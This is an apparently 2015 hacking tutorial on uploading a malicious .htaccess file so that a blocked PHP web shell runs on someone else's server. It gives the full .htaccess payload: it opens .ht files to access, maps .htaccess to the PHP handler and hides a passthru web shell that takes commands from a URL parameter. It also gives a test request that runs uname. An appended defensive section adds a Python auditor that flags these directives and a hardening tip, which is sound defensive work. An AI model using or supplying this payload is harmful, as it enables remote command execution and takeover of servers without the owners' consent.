Kyfx

Bypassing .htaccess permissions & Uploading Shells to Server

Jun 20th, 2015
Hi guys, today I'll be explaining a little something that has helped me occasionally when I try to shell a website. It is one of the many ways that help me upload a shell to a server. Often, we run into situations where we can't upload a PHP file to the server, or where the shell cannot be executed after uploading. That is probably because SetHandler is being used. We can easily bypass the restriction by modifying the .htaccess file on the server. How do we do it? We use another .htaccess file which can be accessed through a URL and which, when executed, dynamically modifies the original .htaccess file. For this tutorial, we'll be working in a scenario in which the shell was uploaded successfully but cannot be executed due to some kind of restriction.

So in this scenario, you go ahead and upload the shell. Now when you try to access the shell and execute it, you'll be welcomed with a forbidden screen, usually stating that you do not have the required permissions to access the file on the server.
Now you know the admin is not shit. Well rather a big shit. So what we will try to do now is upload our own .htaccess file onto the server and divert the original .htaccess file by including our code inside comments.

Code:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

AddType application/x-httpd-php .htaccess

# <?php echo "";echo"";passthru($_GET['cmd']." 2>&1"); ?>#

The first line in the Files parameter simply overrides the default permission settings for the .htaccess file so that it can now be accessed and modified through an external URL. The next line makes sure our file is interpreted as a PHP file, and the last line, written as a comment, is the actual code we want to execute, which is our shell.

Now head over to the URL where you have uploaded the .htaccess file and use:
Code:
.htaccess?cmd=uname%20-a

to see whether it worked.

Now you have successfully overwritten the permissions on this server and you can go ahead and have fun with the shells.
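
From the defender's side, each of the three elements of the .htaccess file above is something an audit can flag. The following Python function is an added example, not part of the original paste; the finding names and the sample file are constructed for illustration.

```python
import re

# Patterns for the three elements of the .htaccess shown above.
FILES_OPEN = re.compile(r"^\s*<Files(Match)?\b(.*)>\s*$", re.I)
FILES_CLOSE = re.compile(r"^\s*</Files(Match)?>", re.I)
ALLOW_ALL = re.compile(r"^\s*(Allow\s+from\s+all|Require\s+all\s+granted)\b", re.I)
PHP_HANDLER = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\b.*php", re.I)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)


def audit_htaccess(text):
    """Return [(line_number, finding)] for the text of one .htaccess file."""
    findings = []
    in_ht_block = False
    for n, line in enumerate(text.splitlines(), 1):
        # Checked on every line, comments included: Apache skips a '#' line,
        # but a PHP interpreter handed the same file does not.
        if PHP_TAG.search(line):
            findings.append((n, "php-code-in-config"))
        if line.lstrip().startswith("#"):
            continue
        opened = FILES_OPEN.match(line)
        if opened:
            # True when the <Files> pattern targets .ht* names.
            in_ht_block = ".ht" in opened.group(2).replace("\\", "")
        elif FILES_CLOSE.match(line):
            in_ht_block = False
        elif in_ht_block and ALLOW_ALL.match(line):
            findings.append((n, "ht-files-made-readable"))
        elif PHP_HANDLER.match(line):
            on_ht = ".htaccess" in line.lower()
            findings.append((n, "php-handler-on-htaccess" if on_ht else "php-handler-override"))
    return findings


# Constructed sample: the directives from the paste, with an inert PHP line.
SAMPLE = r'''<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php echo "marker"; ?>#
'''

if __name__ == "__main__":
    for line_no, finding in audit_htaccess(SAMPLE):
        print(line_no, finding)
```

Run it over every .htaccess found under directories that accept uploads. In the main server configuration, `AllowOverride None` on those directories stops Apache from reading an uploaded .htaccess at all.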